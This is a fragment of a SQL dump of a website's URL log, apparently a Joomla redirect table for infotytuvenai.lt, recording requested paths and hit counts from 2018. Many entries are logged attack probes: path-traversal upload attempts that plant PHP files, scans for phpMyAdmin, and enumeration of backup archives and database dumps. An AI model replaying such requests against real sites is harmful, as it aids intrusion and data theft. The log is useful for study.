11:19:08','0000-00-00 00:00:00'),(1971,'http://infotytuvenai.lt/index.php/lt/?option=com_agorapro','','','',3,0,'2018-01-29 11:19:08','0000-00-00 00:00:00'),(1972,'http://infotytuvenai.lt/index.php/lt/?option=com_agora','','','',3,0,'2018-01-29 11:19:09','0000-00-00 00:00:00'),(1973,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2016_metu_veiklos_ataskaita.pdf','','','',11,0,'2018-02-03 05:51:58','0000-00-00 00:00:00'),(1974,'http://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/balansas_ir_veiklos_rezultatu_ataskaita_2016m.pdf','','','',10,0,'2018-02-03 05:54:41','0000-00-00 00:00:00'),(1975,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/category/','','','',23,0,'2018-02-23 02:08:28','0000-00-00 00:00:00'),(1976,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/tag/','','','',22,0,'2018-02-23 02:10:32','0000-00-00 00:00:00'),(1977,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/item/','','','',25,0,'2018-02-23 02:13:56','0000-00-00 00:00:00'),(1978,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/tag/?format=feed&limitstart=&type=rss','','','',20,0,'2018-02-23 02:26:51','0000-00-00 00:00:00'),(1979,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/tag/?format=feed&limitstart=&type=atom','','','',20,0,'2018-02-23 02:27:21','0000-00-00 00:00:00'),(1980,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/category/','','','',25,0,'2018-02-23 02:55:37','0000-00-00 00:00:00'),(1981,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/tag/','','','',25,0,'2018-02-23 02:58:08','0000-00-00 00:00:00'),(1982,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/tag/?format=feed&limitstart=&type=rss','','','',23,0,'2018-02-23 03:18:03','0000-00-00 00:00:00'),(1983,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/itemlist/tag/?format=feed&limitstart=&type=atom','','','',23,0,'2018-02-23 03:18:37','0000-00-00 00:00:00'),(1984,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../max.php','','','',1,0,'2018-02-27 07:12:20','0000-00-00 00:00:00'),(1985,'http://infotytuvenai.lt/index.php/lt/?option=com_easyblog','','','',2,0,'2018-03-08 07:58:55','0000-00-00 00:00:00'),(1986,'http://infotytuvenai.lt/index.php/lt/blog/item/add?tmpl=component','','','',1,0,'2018-03-08 07:58:56','0000-00-00 00:00:00'),(1987,'http://infotytuvenai.lt/index.php/lt/?option=com_user&view=user&task=edit','','','',1,0,'2018-03-08 07:59:26','0000-00-00 00:00:00'),(1988,'http://infotytuvenai.lt/index.php/lt/sign-in/profile?layout=edit','','','',1,0,'2018-03-08 07:59:47','0000-00-00 00:00:00'),(1989,'http://infotytuvenai.lt/index.php/lt/?option=com_myblog','','','',1,0,'2018-03-08 08:00:05','0000-00-00 00:00:00'),(1990,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../RxR.php','','','',1,0,'2018-03-10 15:57:37','0000-00-00 00:00:00'),(1991,'http://infotytuvenai.lt/index.php/lt/contact-form.php','','','',1,0,'2018-03-12 01:30:17','0000-00-00 00:00:00'),(1992,'http://infotytuvenai.lt/index.php/lt/contact','','','',1,0,'2018-03-12 01:30:18','0000-00-00 00:00:00'),(1993,'http://infotytuvenai.lt/index.php/lt/index.php/contactez-nous','','','',1,0,'2018-03-12 01:30:20','0000-00-00 00:00:00'),(1994,'http://infotytuvenai.lt/index.php/lt/nous-contacter','','','',1,0,'2018-03-12 01:30:21','0000-00-00 00:00:00'),(1995,'http://infotytuvenai.lt/index.php/lt/contactenos','','','',1,0,'2018-03-12 01:30:25','0000-00-00 00:00:00'),(1996,'http://infotytuvenai.lt/index.php/lt/contact-us','','','',1,0,'2018-03-12 01:30:26','0000-00-00 00:00:00'),(1997,'http://infotytuvenai.lt/index.php/lt/contactanos','','','',1,0,'2018-03-12 01:30:28','0000-00-00 00:00:00'),(1998,'http://infotytuvenai.lt/index.php/lt/contattaci','','','',1,0,'2018-03-12 01:30:32','0000-00-00 00:00:00'),(1999,'http://infotytuvenai.lt/index.php/lt/index.php/kontakt','','','',1,0,'2018-03-12 01:30:33','0000-00-00 00:00:00'),(2000,'http://infotytuvenai.lt/index.php/lt/kontakt-os','','','',1,0,'2018-03-12 01:30:34','0000-00-00 00:00:00'),(2001,'http://infotytuvenai.lt/index.php/lt/contact-pog','','','',1,0,'2018-03-12 01:30:34','0000-00-00 00:00:00'),(2002,'http://infotytuvenai.lt/index.php/lt/contact-us.html','','','',1,0,'2018-03-12 01:30:35','0000-00-00 00:00:00'),(2003,'http://infotytuvenai.lt/index.php/lt/contacten.html','','','',1,0,'2018-03-12 01:30:38','0000-00-00 00:00:00'),(2004,'http://infotytuvenai.lt/index.php/lt/kontakty.html','','','',1,0,'2018-03-12 01:30:39','0000-00-00 00:00:00'),(2005,'http://infotytuvenai.lt/index.php/lt/contattaci?id_contact=3','','','',1,0,'2018-03-12 01:30:45','0000-00-00 00:00:00'),(2006,'http://infotytuvenai.lt/index.php/lt/kontakt','','','',1,0,'2018-03-12 01:30:50','0000-00-00 00:00:00'),(2007,'http://infotytuvenai.lt/index.php/lt/android_contact_name','','','',1,0,'2018-03-12 01:30:51','0000-00-00 00:00:00'),(2008,'http://infotytuvenai.lt/index.php/lt/contactez-nous','','','',1,0,'2018-03-12 01:30:55','0000-00-00 00:00:00'),(2009,'http://infotytuvenai.lt/index.php/lt/contacto','','','',1,0,'2018-03-12 01:30:56','0000-00-00 00:00:00'),(2010,'http://infotytuvenai.lt/index.php/lt/contattarci','','','',1,0,'2018-03-12 01:30:59','0000-00-00 00:00:00'),(2011,'http://infotytuvenai.lt/index.php/lt/kontaktieren-sie-uns','','','',1,0,'2018-03-12 01:31:01','0000-00-00 00:00:00'),(2012,'http://infotytuvenai.lt/index.php/lt/contatti','','','',1,0,'2018-03-12 01:31:02','0000-00-00 00:00:00'),(2013,'http://infotytuvenai.lt/index.php/lt/contacts','','','',1,0,'2018-03-12 01:31:04','0000-00-00 00:00:00'),(2014,'http://infotytuvenai.lt/index.php/lt/contact-us?id_contact=14&id_product=1022','','','',1,0,'2018-03-12 01:31:07','0000-00-00 00:00:00'),(2015,'http://infotytuvenai.lt/index.php/lt/susisiekite?id_contact=3&id_product=998','','','',1,0,'2018-03-12 01:31:09','0000-00-00 00:00:00'),(2016,'http://infotytuvenai.lt/index.php/lt/kontakti','','','',1,0,'2018-03-12 01:31:12','0000-00-00 00:00:00'),(2017,'http://infotytuvenai.lt/index.php/lt/contactez-nous?content_only=1','','','',1,0,'2018-03-12 01:31:13','0000-00-00 00:00:00'),(2018,'http://infotytuvenai.lt/index.php/lt/contactus.htm','','','',1,0,'2018-03-12 01:31:18','0000-00-00 00:00:00'),(2019,'http://infotytuvenai.lt/index.php/lt/kundeservice','','','',1,0,'2018-03-12 01:31:21','0000-00-00 00:00:00'),(2020,'http://infotytuvenai.lt/index.php/lt/contactez-nous?objet=1','','','',1,0,'2018-03-12 01:31:23','0000-00-00 00:00:00'),(2021,'http://infotytuvenai.lt/index.php/lt/svento-jokubo-piligrimu-kelias-lietuvoje','','','',2,0,'2018-03-15 19:42:12','0000-00-00 00:00:00'),(2022,'http://www.infotytuvenai.lt/index.php/lt/svento-jokubo-piligrimu-kelias-lietuvoje','','','',1,0,'2018-03-15 19:45:54','0000-00-00 00:00:00'),(2023,'http://infotytuvenai.lt/index.php/lt/robots.txt','','','',130,0,'2018-03-16 03:33:16','0000-00-00 00:00:00'),(2024,'http://www.infotytuvenai.lt/index.php/lt/struktura-ir-kontaktai/administracija','','','',1,0,'2018-03-19 12:27:12','0000-00-00 00:00:00'),(2025,'http://www.infotytuvenai.lt/index.php/lt/apie-mus','','','',2,0,'2018-03-19 12:27:24','0000-00-00 00:00:00'),(2026,'http://www.infotytuvenai.lt/index.php/lt/contacts','','','',3,0,'2018-03-19 12:27:36','0000-00-00 00:00:00'),(2027,'http://www.infotytuvenai.lt/index.php/en/contact','','','',1,0,'2018-03-19 12:27:42','0000-00-00 00:00:00'),(2028,'http://www.infotytuvenai.lt/index.php/en/contact/','','','',1,0,'2018-03-19 12:28:21','0000-00-00 00:00:00'),(2029,'http://www.infotytuvenai.lt/index.php/en/contact-us','','','',1,0,'2018-03-19 12:28:50','0000-00-00 00:00:00'),(2030,'http://www.infotytuvenai.lt/index.php/lt/parama','','','',1,0,'2018-03-19 12:29:17','0000-00-00 00:00:00'),(2031,'http://www.infotytuvenai.lt/index.php/lt/home/kontaktai','','','',1,0,'2018-03-19 12:30:01','0000-00-00 00:00:00'),(2032,'http://www.infotytuvenai.lt/index.php/lt/kontaktai-2','','','',1,0,'2018-03-19 12:30:33','0000-00-00 00:00:00'),(2033,'http://www.infotytuvenai.lt/index.php/lt/lv/kontakti','','','',1,0,'2018-03-19 12:30:43','0000-00-00 00:00:00'),(2034,'http://www.infotytuvenai.lt/index.php/lt/contact','','','',2,0,'2018-03-19 12:31:13','0000-00-00 00:00:00'),(2035,'http://www.infotytuvenai.lt/index.php/lt/apie-mus/kontaktai','','','',1,0,'2018-03-19 12:32:27','0000-00-00 00:00:00'),(2036,'http://www.infotytuvenai.lt/index.php/lt/struktura','','','',1,0,'2018-03-19 12:32:36','0000-00-00 00:00:00'),(2037,'http://www.infotytuvenai.lt/index.php/lt/kontakty','','','',2,0,'2018-03-19 12:32:50','0000-00-00 00:00:00'),(2038,'http://www.infotytuvenai.lt/index.php/lt/informacija','','','',1,0,'2018-03-19 12:33:02','0000-00-00 00:00:00'),(2039,'http://www.infotytuvenai.lt/index.php/lt/ru/kontaktai','','','',1,0,'2018-03-19 12:33:06','0000-00-00 00:00:00'),(2040,'http://www.infotytuvenai.lt/index.php/lt/struktra-ir-kontaktai/kontaktai','','','',1,0,'2018-03-19 12:33:17','0000-00-00 00:00:00'),(2041,'http://www.infotytuvenai.lt/index.php/lt/p/kontaktai','','','',1,0,'2018-03-19 12:33:35','0000-00-00 00:00:00'),(2042,'http://www.infotytuvenai.lt/index.php/lt/struktra-ir-kontaktai/administracija','','','',1,0,'2018-03-19 12:33:55','0000-00-00 00:00:00'),(2043,'http://www.infotytuvenai.lt/index.php/lt/contact-us','','','',2,0,'2018-03-19 12:34:16','0000-00-00 00:00:00'),(2044,'http://www.infotytuvenai.lt/index.php/lt/struktura-ir-kontaktai/vadovai','','','',1,0,'2018-03-19 12:34:23','0000-00-00 00:00:00'),(2045,'http://www.infotytuvenai.lt/index.php/lt/rekvizitai','','','',1,0,'2018-03-19 12:35:55','0000-00-00 00:00:00'),(2046,'http://www.infotytuvenai.lt/index.php/lt/struktura-ir-kontaktai','','','',1,0,'2018-03-19 12:36:08','0000-00-00 00:00:00'),(2047,'http://infotytuvenai.lt/index.php/lt/?option=com_jwallpapers&task=upload','','http://infotytuvenai.lt/index.php?option=com_jwallpapers&task=upload','',971,0,'2018-03-20 04:30:56','0000-00-00 00:00:00'),(2048,'http://infotytuvenai.lt/index.php/lt/phpmyadmin/','','','',6,0,'2018-03-22 09:23:43','0000-00-00 00:00:00'),(2049,'http://infotytuvenai.lt/index.php/lt/pma/','','','',3,0,'2018-03-22 09:23:44','0000-00-00 00:00:00'),(2050,'http://infotytuvenai.lt/index.php/lt/myadmin/','','','',3,0,'2018-03-22 09:23:44','0000-00-00 00:00:00'),(2051,'http://infotytuvenai.lt/index.php/lt/sql/','','','',3,0,'2018-03-22 09:23:45','0000-00-00 00:00:00'),(2052,'http://www.infotytuvenai.lt/index.php/lt/?option=com_adsmanager&task=upload&tmpl=component','','http://www.infotytuvenai.lt/index.php?option=com_adsmanager&task=upload&tmpl=component','',16,0,'2018-03-22 13:26:30','0000-00-00 00:00:00'),(2053,'http://infotytuvenai.lt/index.php/lt/wp-content/uploads/backup-guard/','','','',1,0,'2018-03-23 14:39:53','0000-00-00 00:00:00'),(2054,'http://infotytuvenai.lt/index.php/lt/wp-content/uploads/backups/','','','',1,0,'2018-03-23 14:45:30','0000-00-00 00:00:00'),(2055,'http://infotytuvenai.lt/index.php/lt/wp-content/uploads/backup/','','','',2,0,'2018-03-23 14:51:48','0000-00-00 00:00:00'),(2056,'http://infotytuvenai.lt/index.php/lt/wp-content/backups/','','','',1,0,'2018-03-23 15:36:07','0000-00-00 00:00:00'),(2057,'http://infotytuvenai.lt/index.php/lt/wp-content/backup/','','','',1,0,'2018-03-23 15:44:34','0000-00-00 00:00:00'),(2058,'http://infotytuvenai.lt/index.php/lt/wp-content/plugins/wp-complete-backup/storage/','','','',1,0,'2018-03-23 15:51:01','0000-00-00 00:00:00'),(2059,'http://infotytuvenai.lt/index.php/lt/wp-content/uploads/db-backup/','','','',1,0,'2018-03-23 15:57:06','0000-00-00 00:00:00'),(2060,'http://infotytuvenai.lt/index.php/lt/wp-content/uploads/dbbackup/','','','',1,0,'2018-03-23 16:04:26','0000-00-00 00:00:00'),(2061,'http://infotytuvenai.lt/index.php/lt/wp-content/uploads/wp_all_backup/','','','',1,0,'2018-03-23 16:11:29','0000-00-00 00:00:00'),(2062,'http://infotytuvenai.lt/index.php/lt/wp-content/uploads/backup-database/','','','',1,0,'2018-03-23 16:18:01','0000-00-00 00:00:00'),(2063,'http://infotytuvenai.lt/index.php/lt/backups_root/','','','',1,0,'2018-03-23 16:25:51','0000-00-00 00:00:00'),(2064,'http://infotytuvenai.lt/index.php/lt/wp-snapshots/','','','',1,0,'2018-03-23 16:33:14','0000-00-00 00:00:00'),(2065,'http://infotytuvenai.lt/index.php/lt/wp-content/upsupsystic/','','','',1,0,'2018-03-23 16:36:49','0000-00-00 00:00:00'),(2066,'http://infotytuvenai.lt/index.php/lt/wp-content/z_backups/','','','',1,0,'2018-03-23 16:41:37','0000-00-00 00:00:00'),(2067,'http://infotytuvenai.lt/index.php/lt/my-wp-backup/','','','',1,0,'2018-03-23 16:49:45','0000-00-00 00:00:00'),(2068,'http://infotytuvenai.lt/index.php/lt/wp-content/sedlex/backup-scheduler/','','','',1,0,'2018-03-23 16:55:43','0000-00-00 00:00:00'),(2069,'http://infotytuvenai.lt/index.php/lt/administrator/backups/','','','',1,0,'2018-03-23 17:02:26','0000-00-00 00:00:00'),(2070,'http://infotytuvenai.lt/index.php/lt/administrator/backup/','','','',1,0,'2018-03-23 17:11:23','0000-00-00 00:00:00'),(2071,'http://infotytuvenai.lt/index.php/lt/admin/backups/','','','',1,0,'2018-03-23 17:18:41','0000-00-00 00:00:00'),(2072,'http://infotytuvenai.lt/index.php/lt/admin/backup/','','','',1,0,'2018-03-23 17:25:10','0000-00-00 00:00:00'),(2073,'http://infotytuvenai.lt/index.php/lt/sxd/backup/','','','',1,0,'2018-03-23 17:32:37','0000-00-00 00:00:00'),(2074,'http://infotytuvenai.lt/index.php/lt/cms/backup/','','','',1,0,'2018-03-23 17:39:14','0000-00-00 00:00:00'),(2075,'http://infotytuvenai.lt/index.php/lt/files/backup/','','','',1,0,'2018-03-23 17:45:17','0000-00-00 00:00:00'),(2076,'http://infotytuvenai.lt/index.php/lt/files/backups/','','','',1,0,'2018-03-23 17:52:50','0000-00-00 00:00:00'),(2077,'http://infotytuvenai.lt/index.php/lt/db-backup/','','','',1,0,'2018-03-23 17:59:25','0000-00-00 00:00:00'),(2078,'http://infotytuvenai.lt/index.php/lt/db_backup/','','','',1,0,'2018-03-23 18:03:10','0000-00-00 00:00:00'),(2079,'http://infotytuvenai.lt/index.php/lt/db_backup/data/','','','',1,0,'2018-03-23 18:06:42','0000-00-00 00:00:00'),(2080,'http://infotytuvenai.lt/index.php/lt/mysql-backup/','','','',1,0,'2018-03-23 18:11:26','0000-00-00 00:00:00'),(2081,'http://infotytuvenai.lt/index.php/lt/sql-backup/','','','',1,0,'2018-03-23 18:19:07','0000-00-00 00:00:00'),(2082,'http://infotytuvenai.lt/index.php/lt/dbbackup/backups/','','','',1,0,'2018-03-23 18:23:53','0000-00-00 00:00:00'),(2083,'http://infotytuvenai.lt/index.php/lt/backup/temp/','','','',1,0,'2018-03-23 18:29:05','0000-00-00 00:00:00'),(2084,'http://infotytuvenai.lt/index.php/lt/dbbackuptool/temp/','','','',1,0,'2018-03-23 18:35:48','0000-00-00 00:00:00'),(2085,'http://infotytuvenai.lt/index.php/lt/sqlbuddy/exports/','','','',1,0,'2018-03-23 18:42:14','0000-00-00 00:00:00'),(2086,'http://infotytuvenai.lt/index.php/lt/backupdb/','','','',1,0,'2018-03-23 18:49:12','0000-00-00 00:00:00'),(2087,'http://infotytuvenai.lt/index.php/lt/backup/','','','',1,0,'2018-03-23 18:56:10','0000-00-00 00:00:00'),(2088,'http://infotytuvenai.lt/index.php/lt/backups/','','','',1,0,'2018-03-23 18:59:53','0000-00-00 00:00:00'),(2089,'http://infotytuvenai.lt/index.php/lt/dbbackup/','','','',1,0,'2018-03-23 19:03:48','0000-00-00 00:00:00'),(2090,'http://infotytuvenai.lt/index.php/lt/dbbackups/','','','',1,0,'2018-03-23 19:07:24','0000-00-00 00:00:00'),(2091,'http://infotytuvenai.lt/index.php/lt/temp/backup/','','','',1,0,'2018-03-23 19:11:04','0000-00-00 00:00:00'),(2092,'http://infotytuvenai.lt/index.php/lt/tmp/backup/','','','',2,0,'2018-03-23 19:15:19','0000-00-00 00:00:00'),(2093,'http://infotytuvenai.lt/index.php/lt/temp/backups/','','','',2,0,'2018-03-23 19:22:11','0000-00-00 00:00:00'),(2094,'http://infotytuvenai.lt/index.php/lt/?option=com_easybookreloaded','','http://infotytuvenai.lt/index.php/lt/?option=com_easybookreloaded','',4,0,'2018-03-25 00:30:42','0000-00-00 00:00:00'),(2095,'http://infotytuvenai.lt/index.php/lt/?option=com_vitabook','','http://infotytuvenai.lt/index.php/lt/?option=com_vitabook','',3,0,'2018-03-25 15:08:26','0000-00-00 00:00:00'),(2096,'http://infotytuvenai.lt/index.php/lt/tmp/backups/','','','',1,0,'2018-03-26 10:55:24','0000-00-00 00:00:00'),(2097,'http://infotytuvenai.lt/index.php/lt/dump/','','','',1,0,'2018-03-26 10:59:41','0000-00-00 00:00:00'),(2098,'http://infotytuvenai.lt/index.php/lt/dumps/','','','',1,0,'2018-03-26 11:04:00','0000-00-00 00:00:00'),(2099,'http://infotytuvenai.lt/index.php/lt/zips/','','','',1,0,'2018-03-26 11:08:21','0000-00-00 00:00:00'),(2100,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_backupdatabase/backup/','','','',1,0,'2018-03-26 11:12:58','0000-00-00 00:00:00'),(2101,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_datasafe_pro/DataSAFE_backups/','','','',1,0,'2018-03-26 11:17:56','0000-00-00 00:00:00'),(2102,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_easyjoomlabackup/backups/','','','',1,0,'2018-03-26 11:22:39','0000-00-00 00:00:00'),(2103,'http://infotytuvenai.lt/index.php/lt/administrator/components/com_akeeba/backup/','','','',1,0,'2018-03-26 11:30:03','0000-00-00 00:00:00'),(2104,'http://infotytuvenai.lt/index.php/lt/infotytuvenai.lt.gz','','','',1,0,'2018-03-26 11:37:42','0000-00-00 00:00:00'),(2105,'http://infotytuvenai.lt/index.php/lt/infotytuvenailt.gz','','','',1,0,'2018-03-26 11:47:40','0000-00-00 00:00:00'),(2106,'http://infotytuvenai.lt/index.php/lt/infotytuvenai-lt.gz','','','',1,0,'2018-03-26 11:52:11','0000-00-00 00:00:00'),(2107,'http://infotytuvenai.lt/index.php/lt/infotytuvenai.lt.gzip','','','',1,0,'2018-03-26 11:56:56','0000-00-00 00:00:00'),(2108,'http://infotytuvenai.lt/index.php/lt/infotytuvenailt.gzip','','','',1,0,'2018-03-26 12:01:43','0000-00-00 00:00:00'),(2109,'http://infotytuvenai.lt/index.php/lt/infotytuvenai-lt.gzip','','','',1,0,'2018-03-26 12:06:43','0000-00-00 00:00:00'),(2110,'http://infotytuvenai.lt/index.php/lt/infotytuvenai.lt.zip','','','',2,0,'2018-03-26 12:11:32','0000-00-00 00:00:00'),(2111,'http://infotytuvenai.lt/index.php/lt/infotytuvenailt.zip','','','',1,0,'2018-03-26 12:51:40','0000-00-00 00:00:00'),(2112,'http://infotytuvenai.lt/index.php/lt/infotytuvenai-lt.zip','','','',1,0,'2018-03-26 13:02:37','0000-00-00 00:00:00'),(2113,'http://infotytuvenai.lt/index.php/lt/infotytuvenai.lt.tar','','','',1,0,'2018-03-26 13:13:32','0000-00-00 00:00:00'),(2114,'http://infotytuvenai.lt/index.php/lt/infotytuvenailt.tar','','','',1,0,'2018-03-26 13:24:29','0000-00-00 00:00:00'),(2115,'http://infotytuvenai.lt/index.php/lt/infotytuvenai-lt.tar','','','',1,0,'2018-03-26 13:35:29','0000-00-00 00:00:00'),(2116,'http://infotytuvenai.lt/index.php/lt/infotytuvenai.lt.tar.gz','','','',1,0,'2018-03-26 13:46:42','0000-00-00 00:00:00'),(2117,'http://infotytuvenai.lt/index.php/lt/infotytuvenailt.tar.gz','','','',1,0,'2018-03-26 13:58:07','0000-00-00 00:00:00'),(2118,'http://infotytuvenai.lt/index.php/lt/infotytuvenai-lt.tar.gz','','','',1,0,'2018-03-26 14:09:39','0000-00-00 00:00:00'),(2119,'http://infotytuvenai.lt/index.php/lt/infotytuvenai.lt.jpa','','','',1,0,'2018-03-26 14:21:07','0000-00-00 00:00:00'),(2120,'http://infotytuvenai.lt/index.php/lt/infotytuvenailt.jpa','','','',1,0,'2018-03-26 14:32:36','0000-00-00 00:00:00'),(2121,'http://infotytuvenai.lt/index.php/lt/infotytuvenai-lt.jpa','','','',1,0,'2018-03-26 14:44:08','0000-00-00 00:00:00'),(2122,'http://infotytuvenai.lt/index.php/lt/infotytuvenai.lt.sql','','','',1,0,'2018-03-26 14:55:36','0000-00-00 00:00:00'),(2123,'http://infotytuvenai.lt/index.php/lt/infotytuvenailt.sql','','','',1,0,'2018-03-26 15:07:00','0000-00-00 00:00:00'),(2124,'http://infotytuvenai.lt/index.php/lt/infotytuvenai-lt.sql','','','',1,0,'2018-03-26 15:18:17','0000-00-00 00:00:00'),(2125,'http://infotytuvenai.lt/index.php/lt/www.sql','','','',1,0,'2018-03-26 15:29:53','0000-00-00 00:00:00'),(2126,'http://infotytuvenai.lt/index.php/lt/install.sql','','','',1,0,'2018-03-26 15:41:13','0000-00-00 00:00:00'),(2127,'http://infotytuvenai.lt/index.php/lt/dump.sql','','','',1,0,'2018-03-26 15:52:37','0000-00-00 00:00:00'),(2128,'http://infotytuvenai.lt/index.php/lt/backup.sql','','','',1,0,'2018-03-26 16:03:59','0000-00-00 00:00:00'),(2129,'http://infotytuvenai.lt/index.php/lt/backups.sql','','','',1,0,'2018-03-26 16:15:30','0000-00-00 00:00:00'),(2130,'http://infotytuvenai.lt/index.php/lt/site.sql','','','',1,0,'2018-03-26 16:26:52','0000-00-00 00:00:00'),(2131,'http://infotytuvenai.lt/index.php/lt/web.sql','','','',1,0,'2018-03-26 16:38:11','0000-00-00 00:00:00'),(2132,'http://infotytuvenai.lt/index.php/lt/source.sql','','','',1,0,'2018-03-26 16:52:41','0000-00-00 00:00:00'),(2133,'http://infotytuvenai.lt/index.php/lt/www.jpa','','','',1,0,'2018-03-26 17:03:56','0000-00-00 00:00:00'),(2134,'http://infotytuvenai.lt/index.php/lt/install.jpa','','','',1,0,'2018-03-26 17:15:00','0000-00-00 00:00:00'),(2135,'http://infotytuvenai.lt/index.php/lt/dump.jpa','','','',1,0,'2018-03-26 17:26:04','0000-00-00 00:00:00'),(2136,'http://infotytuvenai.lt/index.php/lt/backup.jpa','','','',1,0,'2018-03-26 17:37:12','0000-00-00 00:00:00'),(2137,'http://infotytuvenai.lt/index.php/lt/backups.jpa','','','',1,0,'2018-03-26 17:56:19','0000-00-00 00:00:00'),(2138,'http://infotytuvenai.lt/index.php/lt/site.jpa','','','',1,0,'2018-03-26 18:06:52','0000-00-00 00:00:00'),(2139,'http://infotytuvenai.lt/index.php/lt/web.jpa','','','',1,0,'2018-03-26 18:17:06','0000-00-00 00:00:00'),(2140,'http://infotytuvenai.lt/index.php/lt/source.jpa','','','',1,0,'2018-03-26 18:27:19','0000-00-00 00:00:00'),(2141,'http://infotytuvenai.lt/index.php/lt/www.tar','','','',1,0,'2018-03-26 18:37:34','0000-00-00 00:00:00'),(2142,'http://infotytuvenai.lt/index.php/lt/install.tar','','','',1,0,'2018-03-26 18:47:47','0000-00-00 00:00:00'),(2143,'http://infotytuvenai.lt/index.php/lt/dump.tar','','','',1,0,'2018-03-26 19:00:01','0000-00-00 00:00:00'),(2144,'http://infotytuvenai.lt/index.php/lt/backup.tar','','','',1,0,'2018-03-26 19:10:53','0000-00-00 00:00:00'),(2145,'http://infotytuvenai.lt/index.php/lt/backups.tar','','','',1,0,'2018-03-26 19:21:10','0000-00-00 00:00:00'),(2146,'http://infotytuvenai.lt/index.php/lt/site.tar','','','',1,0,'2018-03-26 19:31:20','0000-00-00 00:00:00'),(2147,'http://infotytuvenai.lt/index.php/lt/web.tar','','','',1,0,'2018-03-26 19:41:35','0000-00-00 00:00:00'),(2148,'http://infotytuvenai.lt/index.php/lt/source.tar','','','',1,0,'2018-03-26 19:51:58','0000-00-00 00:00:00'),(2149,'http://infotytuvenai.lt/index.php/lt/?option=com_phocaguestbook&id=1','','http://infotytuvenai.lt/index.php/lt/?option=com_phocaguestbook&id=1','',3,0,'2018-03-27 00:25:04','0000-00-00 00:00:00'),(2150,'http://infotytuvenai.lt/index.php/lt/www.zip','','','',1,0,'2018-03-27 07:29:05','0000-00-00 00:00:00'),(2151,'http://infotytuvenai.lt/index.php/lt/install.zip','','','',1,0,'2018-03-27 07:43:13','0000-00-00 00:00:00'),(2152,'http://infotytuvenai.lt/index.php/lt/dump.zip','','','',1,0,'2018-03-27 07:47:30','0000-00-00 00:00:00'),(2153,'http://infotytuvenai.lt/index.php/lt/backup.zip','','','',1,0,'2018-03-27 07:52:27','0000-00-00 00:00:00'),(2154,'http://infotytuvenai.lt/index.php/lt/backups.zip','','','',1,0,'2018-03-27 07:57:28','0000-00-00 00:00:00'),(2155,'http://infotytuvenai.lt/index.php/lt/site.zip','','','',1,0,'2018-03-27 08:02:21','0000-00-00 00:00:00'),(2156,'http://infotytuvenai.lt/index.php/lt/web.zip','','','',1,0,'2018-03-27 08:07:21','0000-00-00 00:00:00'),(2157,'http://infotytuvenai.lt/index.php/lt/source.zip','','','',1,0,'2018-03-27 08:12:25','0000-00-00 00:00:00'),(2158,'http://infotytuvenai.lt/index.php/lt/www.gzip','','','',1,0,'2018-03-27 08:17:21','0000-00-00 00:00:00'),(2159,'http://infotytuvenai.lt/index.php/lt/install.gzip','','','',1,0,'2018-03-27 08:22:24','0000-00-00 00:00:00'),(2160,'http://infotytuvenai.lt/index.php/lt/dump.gzip','','','',1,0,'2018-03-27 08:27:26','0000-00-00 00:00:00'),(2161,'http://infotytuvenai.lt/index.php/lt/backup.gzip','','','',1,0,'2018-03-27 08:32:34','0000-00-00 00:00:00'),(2162,'http://infotytuvenai.lt/index.php/lt/backups.gzip','','','',1,0,'2018-03-27 08:37:46','0000-00-00 00:00:00'),(2163,'http://infotytuvenai.lt/index.php/lt/site.gzip','','','',1,0,'2018-03-27 08:43:03','0000-00-00 00:00:00'),(2164,'http://infotytuvenai.lt/index.php/lt/web.gzip','','','',1,0,'2018-03-27 08:48:24','0000-00-00 00:00:00'),(2165,'http://infotytuvenai.lt/index.php/lt/source.gzip','','','',1,0,'2018-03-27 08:53:51','0000-00-00 00:00:00'),(2166,'http://infotytuvenai.lt/index.php/lt/www.gz','','','',1,0,'2018-03-27 08:59:14','0000-00-00 00:00:00'),(2167,'http://infotytuvenai.lt/index.php/lt/install.gz','','','',1,0,'2018-03-27 09:05:06','0000-00-00 00:00:00'),(2168,'http://infotytuvenai.lt/index.php/lt/dump.gz','','','',1,0,'2018-03-27 09:10:31','0000-00-00 00:00:00'),(2169,'http://infotytuvenai.lt/index.php/lt/backup.gz','','','',1,0,'2018-03-27 09:15:57','0000-00-00 00:00:00'),(2170,'http://infotytuvenai.lt/index.php/lt/backups.gz','','','',1,0,'2018-03-27 09:21:26','0000-00-00 00:00:00'),(2171,'http://infotytuvenai.lt/index.php/lt/site.gz','','','',1,0,'2018-03-27 09:27:16','0000-00-00 00:00:00'),(2172,'http://infotytuvenai.lt/index.php/lt/web.gz','','','',1,0,'2018-03-27 09:33:19','0000-00-00 00:00:00'),(2173,'http://infotytuvenai.lt/index.php/lt/source.gz','','','',1,0,'2018-03-27 09:39:02','0000-00-00 00:00:00'),(2174,'http://infotytuvenai.lt/index.php/lt/db.sql','','','',1,0,'2018-03-27 11:11:35','0000-00-00 00:00:00'),(2175,'http://infotytuvenai.lt/index.php/lt/database.sql','','','',1,0,'2018-03-27 11:16:13','0000-00-00 00:00:00'),(2176,'http://infotytuvenai.lt/index.php/lt/?option=com_akobook','','http://infotytuvenai.lt/index.php/lt/?option=com_akobook','',3,0,'2018-03-28 04:06:34','0000-00-00 00:00:00'),(2177,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2018-03-28 17:57:56','0000-00-00 00:00:00'),(2178,'http://infotytuvenai.lt/index.php/lt//media/error.php','','','',2,0,'2018-03-28 17:57:58','0000-00-00 